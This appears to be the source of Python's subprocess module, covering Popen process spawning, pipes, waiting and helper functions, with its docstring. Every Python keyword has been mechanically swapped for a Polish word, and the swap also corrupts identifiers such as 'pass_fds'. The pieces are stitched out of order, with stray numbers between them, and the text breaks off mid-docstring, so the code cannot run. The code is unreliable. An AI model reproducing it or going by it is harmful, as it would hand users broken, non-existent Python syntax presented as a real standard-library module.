errwrite != -1: errwrite.Close() jeżeli hasattr(self, '_devnull'): os.close(self._devnull) # Retain the process handle, but close the thread handle self._child_created = Prawda self._handle = Handle(hp) self.pid = pid _winapi.CloseHandle(ht) def _internal_poll(self, _deadstate=Nic, _WaitForSingleObject=_winapi.WaitForSingleObject, _WAIT_OBJECT_0=_winapi.WAIT_OBJECT_0, _GetExitCodeProcess=_winapi.GetExitCodeProcess): """Check jeżeli child process has terminated. Returns returncode attribute. This method jest called by __del__, so it can only refer to objects w its local scope. """ jeżeli self.returncode jest Nic: jeżeli _WaitForSingleObject(self._handle, 0) == _WAIT_OBJECT_0: self.returncode = _GetExitCodeProcess(self._handle) zwróć self.returncode def wait(self, timeout=Nic, endtime=Nic): """Wait dla child process to terminate. 
Returns returncode attribute.""" jeżeli endtime jest nie Nic: timeout = self._remaining_time(endtime) jeżeli timeout jest Nic: timeout_millis = _winapi.INFINITE inaczej: timeout_millis = int(timeout * 1000) jeżeli self.returncode jest Nic: result = _winapi.WaitForSingleObject(self._handle, timeout_millis) jeżeli result == _winapi.WAIT_TIMEOUT: podnieś TimeoutExpired(self.args, timeout) self.returncode = _winapi.GetExitCodeProcess(self._handle) zwróć self.returncode def _readerthread(self, fh, buffer): buffer.append(fh.read()) fh.close() def _communicate(self, input, endtime, orig_timeout): # Start reader threads feeding into a list hanging off of this # object, unless they've already been started. jeżeli self.stdout oraz nie hasattr(self, "_stdout_buff"): self._stdout_buff = [] self.stdout_thread = \ threading.Thread(target=self._readerthread, args=(self.stdout, self._stdout_buff)) self.stdout_thread.daemon = Prawda self.stdout_thread.start() jeżeli self.stderr oraz nie hasattr(self, "_stderr_buff"): self._stderr_buff = [] self.stderr_thread = \ threading.Thread(target=self._readerthread, args=(self.stderr, self._stderr_buff)) self.stderr_thread.daemon = Prawda self.stderr_thread.start() jeżeli self.stdin: self._stdin_write(input) # Wait dla the reader threads, albo time out. If we time out, the # threads remain reading oraz the fds left open w case the user # calls communicate again. jeżeli self.stdout jest nie Nic: self.stdout_thread.join(self._remaining_time(endtime)) jeżeli self.stdout_thread.is_alive(): podnieś TimeoutExpired(self.args, orig_timeout) jeżeli self.stderr jest nie Nic: self.stderr_thread.join(self._remaining_time(endtime)) jeżeli self.stderr_thread.is_alive(): podnieś TimeoutExpired(self.args, orig_timeout) # Collect the output z oraz close both pipes, now that we know # both have been read successfully. 
stdout = Nic stderr = Nic jeżeli self.stdout: stdout = self._stdout_buff self.stdout.close() jeżeli self.stderr: stderr = self._stderr_buff self.stderr.close() # All data exchanged. Translate lists into strings. jeżeli stdout jest nie Nic: stdout = stdout[0] jeżeli stderr jest nie Nic: stderr = stderr[0] zwróć (stdout, stderr) def send_signal(self, sig): """Send a signal to the process """ jeżeli sig == signal.SIGTERM: self.terminate() albo_inaczej sig == signal.CTRL_C_EVENT: os.kill(self.pid, signal.CTRL_C_EVENT) albo_inaczej sig == signal.CTRL_BREAK_EVENT: os.kill(self.pid, signal.CTRL_BREAK_EVENT) inaczej: podnieś ValueError("Unsupported signal: {}".format(sig)) def terminate(self): """Terminates the process """ spróbuj: _winapi.TerminateProcess(self._handle, 1) wyjąwszy PermissionError: # ERROR_ACCESS_DENIED (winerror 5) jest received when the # process already died. rc = _winapi.GetExitCodeProcess(self._handle) jeżeli rc == _winapi.STILL_ACTIVE: podnieś self.returncode = rc kill = terminate inaczej: # # POSIX methods # albo_inaczej stdin == DEVNULL: p2cread = self._get_devnull() albo_inaczej isinstance(stdin, int): p2cread = stdin inaczej: # Assuming file-like object p2cread = stdin.fileno() jeżeli stdout jest Nic: dalej albo_inaczej stdout == PIPE: c2pread, c2pwrite = os.pipe() albo_inaczej stdout == DEVNULL: c2pwrite = self._get_devnull() albo_inaczej isinstance(stdout, int): c2pwrite = stdout inaczej: # Assuming file-like object c2pwrite = stdout.fileno() jeżeli stderr jest Nic: dalej albo_inaczej stderr == PIPE: errread, errwrite = os.pipe() albo_inaczej stderr == STDOUT: errwrite = c2pwrite albo_inaczej stderr == DEVNULL: errwrite = self._get_devnull() albo_inaczej isinstance(stderr, int): errwrite = stderr inaczej: # Assuming file-like object errwrite = stderr.fileno() zwróć (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite) def _execute_child(self, args, executable, preexec_fn, close_fds, dalej_fds, cwd, env, startupinfo, creationflags, shell, 
p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, restore_signals, start_new_session): """Execute program (POSIX version)""" jeżeli isinstance(args, (str, bytes)): args = [args] inaczej: args = list(args) jeżeli shell: args = ["/bin/sh", "-c"] + args jeżeli executable: args[0] = executable jeżeli executable jest Nic: executable = args[0] orig_executable = executable # For transferring possible exec failure z child to parent. # Data format: "exception name:hex errno:description" # Pickle jest nie used; it jest complex oraz involves memory allocation. errpipe_read, errpipe_write = os.pipe() # errpipe_write must nie be w the standard io 0, 1, albo 2 fd range. low_fds_to_close = [] dopóki errpipe_write < 3: low_fds_to_close.append(errpipe_write) errpipe_write = os.dup(errpipe_write) dla low_fd w low_fds_to_close: os.close(low_fd) spróbuj: spróbuj: # We must avoid complex work that could involve # malloc albo free w the child process to avoid # potential deadlocks, thus we do all this here. # oraz dalej it to fork_exec() jeżeli env jest nie Nic: env_list = [os.fsencode(k) + b'=' + os.fsencode(v) dla k, v w env.items()] inaczej: env_list = Nic # Use execv instead of execve. executable = os.fsencode(executable) jeżeli os.path.dirname(executable): executable_list = (executable,) inaczej: # This matches the behavior of os._execvpe(). executable_list = tuple( os.path.join(os.fsencode(dir), executable) dla dir w os.get_exec_path(env)) fds_to_keep = set(pass_fds) fds_to_keep.add(errpipe_write) self.pid = _posixsubprocess.fork_exec( args, executable_list, close_fds, sorted(fds_to_keep), cwd, env_list, p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite, errpipe_read, errpipe_write, restore_signals, start_new_session, preexec_fn) self._child_created = Prawda w_końcu: # be sure the FD jest closed no matter what os.close(errpipe_write) # self._devnull jest nie always defined. 
devnull_fd = getattr(self, '_devnull', Nic) jeżeli p2cread != -1 oraz p2cwrite != -1 oraz p2cread != devnull_fd: os.close(p2cread) jeżeli c2pwrite != -1 oraz c2pread != -1 oraz c2pwrite != devnull_fd: os.close(c2pwrite) jeżeli errwrite != -1 oraz errread != -1 oraz errwrite != devnull_fd: os.close(errwrite) jeżeli devnull_fd jest nie Nic: os.close(devnull_fd) # Prevent a double close of these fds z __init__ on error. self._closed_child_pipe_fds = Prawda # Wait dla exec to fail albo succeed; possibly raising an # exception (limited w size) errpipe_data = bytearray() dopóki Prawda: part = os.read(errpipe_read, 50000) errpipe_data += part jeżeli nie part albo len(errpipe_data) > 50000: przerwij w_końcu: # be sure the FD jest closed no matter what os.close(errpipe_read) jeżeli errpipe_data: spróbuj: os.waitpid(self.pid, 0) wyjąwszy ChildProcessError: dalej spróbuj: exception_name, hex_errno, err_msg = ( errpipe_data.split(b':', 2)) wyjąwszy ValueError: exception_name = b'SubprocessError' hex_errno = b'0' err_msg = (b'Bad exception data z child: ' + repr(errpipe_data)) child_exception_type = getattr( builtins, exception_name.decode('ascii'), SubprocessError) err_msg = err_msg.decode(errors="surrogatepass") jeżeli issubclass(child_exception_type, OSError) oraz hex_errno: errno_num = int(hex_errno, 16) child_exec_never_called = (err_msg == "noexec") jeżeli child_exec_never_called: err_msg = "" jeżeli errno_num != 0: err_msg = os.strerror(errno_num) jeżeli errno_num == errno.ENOENT: jeżeli child_exec_never_called: # The error must be z chdir(cwd). 
err_msg += ': ' + repr(cwd) inaczej: err_msg += ': ' + repr(orig_executable) podnieś child_exception_type(errno_num, err_msg) podnieś child_exception_type(err_msg) def _handle_exitstatus(self, sts, _WIFSIGNALED=os.WIFSIGNALED, _WTERMSIG=os.WTERMSIG, _WIFEXITED=os.WIFEXITED, _WEXITSTATUS=os.WEXITSTATUS): """All callers to this function MUST hold self._waitpid_lock.""" # This method jest called (indirectly) by __del__, so it cannot # refer to anything outside of its local scope. jeżeli _WIFSIGNALED(sts): self.returncode = -_WTERMSIG(sts) albo_inaczej _WIFEXITED(sts): self.returncode = _WEXITSTATUS(sts) inaczej: # Should never happen podnieś SubprocessError("Unknown child exit status!") def _internal_poll(self, _deadstate=Nic, _waitpid=os.waitpid, _WNOHANG=os.WNOHANG, _ECHILD=errno.ECHILD): """Check jeżeli child process has terminated. Returns returncode attribute. This method jest called by __del__, so it cannot reference anything outside of the local scope (nor can any methods it calls). """ jeżeli self.returncode jest Nic: jeżeli nie self._waitpid_lock.acquire(Nieprawda): # Something inaczej jest busy calling waitpid. Don't allow two # at once. We know nothing yet. zwróć Nic spróbuj: jeżeli self.returncode jest nie Nic: zwróć self.returncode # Another thread waited. pid, sts = _waitpid(self.pid, _WNOHANG) jeżeli pid == self.pid: self._handle_exitstatus(sts) wyjąwszy OSError jako e: jeżeli _deadstate jest nie Nic: self.returncode = _deadstate albo_inaczej e.errno == _ECHILD: # This happens jeżeli SIGCLD jest set to be ignored albo # waiting dla child processes has otherwise been # disabled dla our process. This child jest dead, we # can't get the status. 
# http://bugs.python.org/issue15756 self.returncode = 0 w_końcu: self._waitpid_lock.release() zwróć self.returncode def _try_wait(self, wait_flags): """All callers to this function MUST hold self._waitpid_lock.""" spróbuj: (pid, sts) = os.waitpid(self.pid, wait_flags) wyjąwszy ChildProcessError: # This happens jeżeli SIGCLD jest set to be ignored albo waiting # dla child processes has otherwise been disabled dla our # process. This child jest dead, we can't get the status. pid = self.pid sts = 0 zwróć (pid, sts) def wait(self, timeout=Nic, endtime=Nic): """Wait dla child process to terminate. Returns returncode attribute.""" jeżeli self.returncode jest nie Nic: zwróć self.returncode # endtime jest preferred to timeout. timeout jest only used for # printing. jeżeli endtime jest nie Nic albo timeout jest nie Nic: jeżeli endtime jest Nic: endtime = _time() + timeout albo_inaczej timeout jest Nic: timeout = self._remaining_time(endtime) jeżeli endtime jest nie Nic: # Enter a busy loop jeżeli we have a timeout. This busy loop was # cribbed z Lib/threading.py w Thread.wait() at r71065. delay = 0.0005 # 500 us -> initial delay of 1 ms dopóki Prawda: jeżeli self._waitpid_lock.acquire(Nieprawda): spróbuj: jeżeli self.returncode jest nie Nic: przerwij # Another thread waited. (pid, sts) = self._try_wait(os.WNOHANG) assert pid == self.pid albo pid == 0 jeżeli pid == self.pid: self._handle_exitstatus(sts) przerwij w_końcu: self._waitpid_lock.release() remaining = self._remaining_time(endtime) jeżeli remaining <= 0: podnieś TimeoutExpired(self.args, timeout) delay = min(delay * 2, remaining, .05) time.sleep(delay) inaczej: dopóki self.returncode jest Nic: przy self._waitpid_lock: jeżeli self.returncode jest nie Nic: przerwij # Another thread waited. (pid, sts) = self._try_wait(0) # Check the pid oraz loop jako waitpid has been known to # zwróć 0 even without WNOHANG w odd situations. # http://bugs.python.org/issue14396. 
jeżeli pid == self.pid: self._handle_exitstatus(sts) zwróć self.returncode def _communicate(self, input, endtime, orig_timeout): jeżeli self.stdin oraz nie self._communication_started: # Flush stdio buffer. This might block, jeżeli the user has # been writing to .stdin w an uncontrolled fashion. self.stdin.flush() jeżeli nie input: self.stdin.close() stdout = Nic stderr = Nic # Only create this mapping jeżeli we haven't already. jeżeli nie self._communication_started: self._fileobj2output = {} jeżeli self.stdout: self._fileobj2output[self.stdout] = [] jeżeli self.stderr: self._fileobj2output[self.stderr] = [] jeżeli self.stdout: stdout = self._fileobj2output[self.stdout] jeżeli self.stderr: stderr = self._fileobj2output[self.stderr] self._save_input(input) jeżeli self._input: input_view = memoryview(self._input) przy _PopenSelector() jako selector: jeżeli self.stdin oraz input: selector.register(self.stdin, selectors.EVENT_WRITE) jeżeli self.stdout: selector.register(self.stdout, selectors.EVENT_READ) jeżeli self.stderr: selector.register(self.stderr, selectors.EVENT_READ) dopóki selector.get_map(): timeout = self._remaining_time(endtime) jeżeli timeout jest nie Nic oraz timeout < 0: podnieś TimeoutExpired(self.args, orig_timeout) ready = selector.select(timeout) self._check_timeout(endtime, orig_timeout) # XXX Rewrite these to use non-blocking I/O on the file # objects; they are no longer using C stdio! 
dla key, events w ready: jeżeli key.fileobj jest self.stdin: chunk = input_view[self._input_offset : self._input_offset + _PIPE_BUF] spróbuj: self._input_offset += os.write(key.fd, chunk) wyjąwszy BrokenPipeError: selector.unregister(key.fileobj) key.fileobj.close() inaczej: jeżeli self._input_offset >= len(self._input): selector.unregister(key.fileobj) key.fileobj.close() albo_inaczej key.fileobj w (self.stdout, self.stderr): data = os.read(key.fd, 32768) jeżeli nie data: selector.unregister(key.fileobj) key.fileobj.close() self._fileobj2output[key.fileobj].append(data) self.wait(timeout=self._remaining_time(endtime)) # All data exchanged. Translate lists into strings. jeżeli stdout jest nie Nic: stdout = b''.join(stdout) jeżeli stderr jest nie Nic: stderr = b''.join(stderr) # Translate newlines, jeżeli requested. # This also turns bytes into strings. jeżeli self.universal_newlines: jeżeli stdout jest nie Nic: stdout = self._translate_newlines(stdout, self.stdout.encoding) jeżeli stderr jest nie Nic: stderr = self._translate_newlines(stderr, self.stderr.encoding) zwróć (stdout, stderr) def _save_input(self, input): # This method jest called z the _communicate_with_*() methods # so that jeżeli we time out dopóki communicating, we can kontynuuj # sending input jeżeli we retry. jeżeli self.stdin oraz self._input jest Nic: self._input_offset = 0 self._input = input jeżeli self.universal_newlines oraz input jest nie Nic: self._input = self._input.encode(self.stdin.encoding) def send_signal(self, sig): """Send a signal to the process """ os.kill(self.pid, sig) def terminate(self): """Terminate the process przy SIGTERM """ self.send_signal(signal.SIGTERM) def kill(self): """Kill the process przy SIGKILL """ self.send_signal(signal.SIGKILL)
39.175141
91
0.5909
# subprocess - Subprocesses przy accessible I/O streams # # For more information about this module, see PEP 324. # # Copyright (c) 2003-2005 by Peter Astrand <astrand@lysator.liu.se> # # Licensed to PSF under a Contributor Agreement. # See http://www.python.org/2.4/license dla licensing details. r"""subprocess - Subprocesses przy accessible I/O streams This module allows you to spawn processes, connect to their input/output/error pipes, oraz obtain their zwróć codes. This module intends to replace several older modules oraz functions: os.system os.spawn* Information about how the subprocess module can be used to replace these modules oraz functions can be found below. Using the subprocess module =========================== This module defines one klasa called Popen: klasa Popen(args, bufsize=-1, executable=Nic, stdin=Nic, stdout=Nic, stderr=Nic, preexec_fn=Nic, close_fds=Prawda, shell=Nieprawda, cwd=Nic, env=Nic, universal_newlines=Nieprawda, startupinfo=Nic, creationflags=0, restore_signals=Prawda, start_new_session=Nieprawda, dalej_fds=()): Arguments are: args should be a string, albo a sequence of program arguments. The program to execute jest normally the first item w the args sequence albo string, but can be explicitly set by using the executable argument. On POSIX, przy shell=Nieprawda (default): In this case, the Popen class uses os.execvp() to execute the child program. args should normally be a sequence. A string will be treated jako a sequence przy the string as the only item (the program to execute). On POSIX, przy shell=Prawda: If args jest a string, it specifies the command string to execute through the shell. If args jest a sequence, the first item specifies the command string, oraz any additional items will be treated jako additional shell arguments. On Windows: the Popen klasa uses CreateProcess() to execute the child program, which operates on strings. If args jest a sequence, it will be converted to a string using the list2cmdline method. 
Please note that not all MS Windows applications interpret the command line the same way: The list2cmdline jest designed dla applications using the same rules jako the MS C runtime. bufsize will be supplied jako the corresponding argument to the io.open() function when creating the stdin/stdout/stderr pipe file objects: 0 means unbuffered (read & write are one system call oraz can zwróć short), 1 means line buffered, any other positive value means use a buffer of approximately that size. A negative bufsize, the default, means the system default of io.DEFAULT_BUFFER_SIZE will be used. stdin, stdout oraz stderr specify the executed programs' standard input, standard output oraz standard error file handles, respectively. Valid values are PIPE, an existing file descriptor (a positive integer), an existing file object, oraz Nic. PIPE indicates that a new pipe to the child should be created. With Nic, no redirection will occur; the child's file handles will be inherited z the parent. Additionally, stderr can be STDOUT, which indicates that the stderr data z the applications should be captured into the same file handle jako dla stdout. On POSIX, jeżeli preexec_fn jest set to a callable object, this object will be called w the child process just before the child jest executed. The use of preexec_fn jest nie thread safe, using it w the presence of threads could lead to a deadlock w the child process before the new executable is executed. If close_fds jest true, all file descriptors wyjąwszy 0, 1 oraz 2 will be closed before the child process jest executed. The default dla close_fds varies by platform: Always true on POSIX. Prawda when stdin/stdout/stderr are Nic on Windows, false otherwise. pass_fds jest an optional sequence of file descriptors to keep open between the parent oraz child. Providing any dalej_fds implicitly sets close_fds to true. jeżeli shell jest true, the specified command will be executed through the shell. 
If cwd jest nie Nic, the current directory will be changed to cwd before the child jest executed. On POSIX, jeżeli restore_signals jest Prawda all signals that Python sets to SIG_IGN are restored to SIG_DFL w the child process before the exec. Currently this includes the SIGPIPE, SIGXFZ oraz SIGXFSZ signals. This parameter does nothing on Windows. On POSIX, jeżeli start_new_session jest Prawda, the setsid() system call will be made in the child process prior to executing the command. If env jest nie Nic, it defines the environment variables dla the new process. If universal_newlines jest Nieprawda, the file objects stdin, stdout oraz stderr are opened jako binary files, oraz no line ending conversion jest done. If universal_newlines jest Prawda, the file objects stdout oraz stderr are opened jako a text file, but lines may be terminated by any of '\n', the Unix end-of-line convention, '\r', the old Macintosh convention albo '\r\n', the Windows convention. All of these external representations are seen jako '\n' by the Python program. Also, the newlines attribute of the file objects stdout, stdin oraz stderr are nie updated by the communicate() method. In either case, the process being communicated przy should start up expecting to receive bytes on its standard input oraz decode them with the same encoding they are sent in. The startupinfo oraz creationflags, jeżeli given, will be dalejed to the underlying CreateProcess() function. They can specify things such as appearance of the main window oraz priority dla the new process. (Windows only) This module also defines some shortcut functions: call(*popenargs, **kwargs): Run command przy arguments. Wait dla command to complete, then zwróć the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: >>> retcode = subprocess.call(["ls", "-l"]) check_call(*popenargs, **kwargs): Run command przy arguments. Wait dla command to complete. 
If the exit code was zero then return, otherwise podnieś CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: >>> subprocess.check_call(["ls", "-l"]) 0 getstatusoutput(cmd): Return (status, output) of executing cmd w a shell. Execute the string 'cmd' w a shell przy 'check_output' oraz zwróć a 2-tuple (status, output). Universal newlines mode jest used, meaning that the result przy be decoded to a string. A trailing newline jest stripped z the output. The exit status dla the command can be interpreted according to the rules dla the function 'wait'. Example: >>> subprocess.getstatusoutput('ls /bin/ls') (0, '/bin/ls') >>> subprocess.getstatusoutput('cat /bin/junk') (256, 'cat: /bin/junk: No such file albo directory') >>> subprocess.getstatusoutput('/bin/junk') (256, 'sh: /bin/junk: nie found') getoutput(cmd): Return output (stdout albo stderr) of executing cmd w a shell. Like getstatusoutput(), wyjąwszy the exit status jest ignored oraz the zwróć value jest a string containing the command's output. Example: >>> subprocess.getoutput('ls /bin/ls') '/bin/ls' check_output(*popenargs, **kwargs): Run command przy arguments oraz zwróć its output. If the exit code was non-zero it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute oraz output w the output attribute. The arguments are the same jako dla the Popen constructor. Example: >>> output = subprocess.check_output(["ls", "-l", "/dev/null"]) There jest an additional optional argument, "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument. If universal_newlines jest set to Prawda, the "input" argument must be a string rather than bytes, oraz the zwróć value will be a string. 
Exceptions ---------- Exceptions podnieśd w the child process, before the new program has started to execute, will be re-raised w the parent. Additionally, the exception object will have one extra attribute called 'child_traceback', which jest a string containing traceback information z the child's point of view. The most common exception podnieśd jest OSError. This occurs, for example, when trying to execute a non-existent file. Applications should prepare dla OSErrors. A ValueError will be podnieśd jeżeli Popen jest called przy invalid arguments. Exceptions defined within this module inherit z SubprocessError. check_call() oraz check_output() will podnieś CalledProcessError jeżeli the called process returns a non-zero zwróć code. TimeoutExpired be podnieśd jeżeli a timeout was specified oraz expired. Security -------- Unlike some other popen functions, this implementation will never call /bin/sh implicitly. This means that all characters, including shell metacharacters, can safely be dalejed to child processes. Popen objects ============= Instances of the Popen klasa have the following methods: poll() Check jeżeli child process has terminated. Returns returncode attribute. wait() Wait dla child process to terminate. Returns returncode attribute. communicate(input=Nic) Interact przy process: Send data to stdin. Read data z stdout oraz stderr, until end-of-file jest reached. Wait dla process to terminate. The optional input argument should be data to be sent to the child process, albo Nic, jeżeli no data should be sent to the child. If the Popen instance was constructed przy universal_newlines set to Prawda, the input argument should be a string oraz will be encoded using the preferred system encoding (see locale.getpreferredencoding); jeżeli universal_newlines jest Nieprawda, the input argument should be a byte string. communicate() returns a tuple (stdout, stderr). 
Note: The data read jest buffered w memory, so do nie use this method jeżeli the data size jest large albo unlimited. The following attributes are also available: stdin If the stdin argument jest PIPE, this attribute jest a file object that provides input to the child process. Otherwise, it jest Nic. stdout If the stdout argument jest PIPE, this attribute jest a file object that provides output z the child process. Otherwise, it jest Nic. stderr If the stderr argument jest PIPE, this attribute jest file object that provides error output z the child process. Otherwise, it jest Nic. pid The process ID of the child process. returncode The child zwróć code. A Nic value indicates that the process hasn't terminated yet. A negative value -N indicates that the child was terminated by signal N (POSIX only). Replacing older functions przy the subprocess module ==================================================== In this section, "a ==> b" means that b can be used jako a replacement dla a. Note: All functions w this section fail (more albo less) silently if the executed program cannot be found; this module podnieśs an OSError exception. In the following examples, we assume that the subprocess module jest imported przy "z subprocess zaimportuj *". Replacing /bin/sh shell backquote --------------------------------- output=`mycmd myarg` ==> output = Popen(["mycmd", "myarg"], stdout=PIPE).communicate()[0] Replacing shell pipe line ------------------------- output=`dmesg | grep hda` ==> p1 = Popen(["dmesg"], stdout=PIPE) p2 = Popen(["grep", "hda"], stdin=p1.stdout, stdout=PIPE) output = p2.communicate()[0] Replacing os.system() --------------------- sts = os.system("mycmd" + " myarg") ==> p = Popen("mycmd" + " myarg", shell=Prawda) pid, sts = os.waitpid(p.pid, 0) Note: * Calling the program through the shell jest usually nie required. * It's easier to look at the returncode attribute than the exitstatus. 
A more real-world example would look like this: spróbuj: retcode = call("mycmd" + " myarg", shell=Prawda) jeżeli retcode < 0: print("Child was terminated by signal", -retcode, file=sys.stderr) inaczej: print("Child returned", retcode, file=sys.stderr) wyjąwszy OSError jako e: print("Execution failed:", e, file=sys.stderr) Replacing os.spawn* ------------------- P_NOWAIT example: pid = os.spawnlp(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg") ==> pid = Popen(["/bin/mycmd", "myarg"]).pid P_WAIT example: retcode = os.spawnlp(os.P_WAIT, "/bin/mycmd", "mycmd", "myarg") ==> retcode = call(["/bin/mycmd", "myarg"]) Vector example: os.spawnvp(os.P_NOWAIT, path, args) ==> Popen([path] + args[1:]) Environment example: os.spawnlpe(os.P_NOWAIT, "/bin/mycmd", "mycmd", "myarg", env) ==> Popen(["/bin/mycmd", "myarg"], env={"PATH": "/usr/bin"}) """ zaimportuj sys _mswindows = (sys.platform == "win32") zaimportuj io zaimportuj os zaimportuj time zaimportuj signal zaimportuj builtins zaimportuj warnings zaimportuj errno z time zaimportuj monotonic jako _time # Exception classes used by this module. klasa SubprocessError(Exception): dalej klasa CalledProcessError(SubprocessError): """This exception jest podnieśd when a process run by check_call() albo check_output() returns a non-zero exit status. The exit status will be stored w the returncode attribute; check_output() will also store the output w the output attribute. 
""" def __init__(self, returncode, cmd, output=Nic, stderr=Nic): self.returncode = returncode self.cmd = cmd self.output = output self.stderr = stderr def __str__(self): zwróć "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode) @property def stdout(self): """Alias dla output attribute, to match stderr""" zwróć self.output @stdout.setter def stdout(self, value): # There's no obvious reason to set this, but allow it anyway so # .stdout jest a transparent alias dla .output self.output = value klasa TimeoutExpired(SubprocessError): """This exception jest podnieśd when the timeout expires dopóki waiting dla a child process. """ def __init__(self, cmd, timeout, output=Nic, stderr=Nic): self.cmd = cmd self.timeout = timeout self.output = output self.stderr = stderr def __str__(self): zwróć ("Command '%s' timed out after %s seconds" % (self.cmd, self.timeout)) @property def stdout(self): zwróć self.output @stdout.setter def stdout(self, value): # There's no obvious reason to set this, but allow it anyway so # .stdout jest a transparent alias dla .output self.output = value jeżeli _mswindows: zaimportuj threading zaimportuj msvcrt zaimportuj _winapi klasa STARTUPINFO: dwFlags = 0 hStdInput = Nic hStdOutput = Nic hStdError = Nic wShowWindow = 0 inaczej: zaimportuj _posixsubprocess zaimportuj select zaimportuj selectors spróbuj: zaimportuj threading wyjąwszy ImportError: zaimportuj dummy_threading jako threading # When select albo poll has indicated that the file jest writable, # we can write up to _PIPE_BUF bytes without risk of blocking. # POSIX defines PIPE_BUF jako >= 512. _PIPE_BUF = getattr(select, 'PIPE_BUF', 512) # poll/select have the advantage of nie requiring any extra file # descriptor, contrarily to epoll/kqueue (also, they require a single # syscall). 
jeżeli hasattr(selectors, 'PollSelector'): _PopenSelector = selectors.PollSelector inaczej: _PopenSelector = selectors.SelectSelector __all__ = ["Popen", "PIPE", "STDOUT", "call", "check_call", "getstatusoutput", "getoutput", "check_output", "run", "CalledProcessError", "DEVNULL", "SubprocessError", "TimeoutExpired", "CompletedProcess"] # NOTE: We intentionally exclude list2cmdline jako it jest # considered an internal implementation detail. issue10838. jeżeli _mswindows: z _winapi zaimportuj (CREATE_NEW_CONSOLE, CREATE_NEW_PROCESS_GROUP, STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE, SW_HIDE, STARTF_USESTDHANDLES, STARTF_USESHOWWINDOW) __all__.extend(["CREATE_NEW_CONSOLE", "CREATE_NEW_PROCESS_GROUP", "STD_INPUT_HANDLE", "STD_OUTPUT_HANDLE", "STD_ERROR_HANDLE", "SW_HIDE", "STARTF_USESTDHANDLES", "STARTF_USESHOWWINDOW"]) klasa Handle(int): closed = Nieprawda def Close(self, CloseHandle=_winapi.CloseHandle): jeżeli nie self.closed: self.closed = Prawda CloseHandle(self) def Detach(self): jeżeli nie self.closed: self.closed = Prawda zwróć int(self) podnieś ValueError("already closed") def __repr__(self): zwróć "%s(%d)" % (self.__class__.__name__, int(self)) __del__ = Close __str__ = __repr__ # This lists holds Popen instances dla which the underlying process had nie # exited at the time its __del__ method got called: those processes are wait()ed # dla synchronously z _cleanup() when a new Popen object jest created, to avoid # zombie processes. _active = [] def _cleanup(): dla inst w _active[:]: res = inst._internal_poll(_deadstate=sys.maxsize) jeżeli res jest nie Nic: spróbuj: _active.remove(inst) wyjąwszy ValueError: # This can happen jeżeli two threads create a new Popen instance. # It's harmless that it was already removed, so ignore. dalej PIPE = -1 STDOUT = -2 DEVNULL = -3 # XXX This function jest only used by multiprocessing oraz the test suite, # but it's here so that it can be imported when Python jest compiled without # threads. 
def _args_from_interpreter_flags(): """Return a list of command-line arguments reproducing the current settings w sys.flags oraz sys.warnoptions.""" flag_opt_map = { 'debug': 'd', # 'inspect': 'i', # 'interactive': 'i', 'optimize': 'O', 'dont_write_bytecode': 'B', 'no_user_site': 's', 'no_site': 'S', 'ignore_environment': 'E', 'verbose': 'v', 'bytes_warning': 'b', 'quiet': 'q', 'hash_randomization': 'R', } args = [] dla flag, opt w flag_opt_map.items(): v = getattr(sys.flags, flag) jeżeli v > 0: jeżeli flag == 'hash_randomization': v = 1 # Handle specification of an exact seed args.append('-' + opt * v) dla opt w sys.warnoptions: args.append('-W' + opt) zwróć args def call(*popenargs, timeout=Nic, **kwargs): """Run command przy arguments. Wait dla command to complete albo timeout, then zwróć the returncode attribute. The arguments are the same jako dla the Popen constructor. Example: retcode = call(["ls", "-l"]) """ przy Popen(*popenargs, **kwargs) jako p: spróbuj: zwróć p.wait(timeout=timeout) wyjąwszy: p.kill() p.wait() podnieś def check_call(*popenargs, **kwargs): """Run command przy arguments. Wait dla command to complete. If the exit code was zero then return, otherwise podnieś CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute. The arguments are the same jako dla the call function. Example: check_call(["ls", "-l"]) """ retcode = call(*popenargs, **kwargs) jeżeli retcode: cmd = kwargs.get("args") jeżeli cmd jest Nic: cmd = popenargs[0] podnieś CalledProcessError(retcode, cmd) zwróć 0 def check_output(*popenargs, timeout=Nic, **kwargs): r"""Run command przy arguments oraz zwróć its output. If the exit code was non-zero it podnieśs a CalledProcessError. The CalledProcessError object will have the zwróć code w the returncode attribute oraz output w the output attribute. The arguments are the same jako dla the Popen constructor. 
Example: >>> check_output(["ls", "-l", "/dev/null"]) b'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n' The stdout argument jest nie allowed jako it jest used internally. To capture standard error w the result, use stderr=STDOUT. >>> check_output(["/bin/sh", "-c", ... "ls -l non_existent_file ; exit 0"], ... stderr=STDOUT) b'ls: non_existent_file: No such file albo directory\n' There jest an additional optional argument, "input", allowing you to dalej a string to the subprocess's stdin. If you use this argument you may nie also use the Popen constructor's "stdin" argument, as it too will be used internally. Example: >>> check_output(["sed", "-e", "s/foo/bar/"], ... input=b"when w the course of fooman events\n") b'when w the course of barman events\n' If universal_newlines=Prawda jest dalejed, the "input" argument must be a string oraz the zwróć value will be a string rather than bytes. """ jeżeli 'stdout' w kwargs: podnieś ValueError('stdout argument nie allowed, it will be overridden.') jeżeli 'input' w kwargs oraz kwargs['input'] jest Nic: # Explicitly dalejing input=Nic was previously equivalent to dalejing an # empty string. That jest maintained here dla backwards compatibility. kwargs['input'] = '' jeżeli kwargs.get('universal_newlines', Nieprawda) inaczej b'' zwróć run(*popenargs, stdout=PIPE, timeout=timeout, check=Prawda, **kwargs).stdout klasa CompletedProcess(object): """A process that has finished running. This jest returned by run(). Attributes: args: The list albo str args dalejed to run(). returncode: The exit code of the process, negative dla signals. stdout: The standard output (Nic jeżeli nie captured). stderr: The standard error (Nic jeżeli nie captured). 
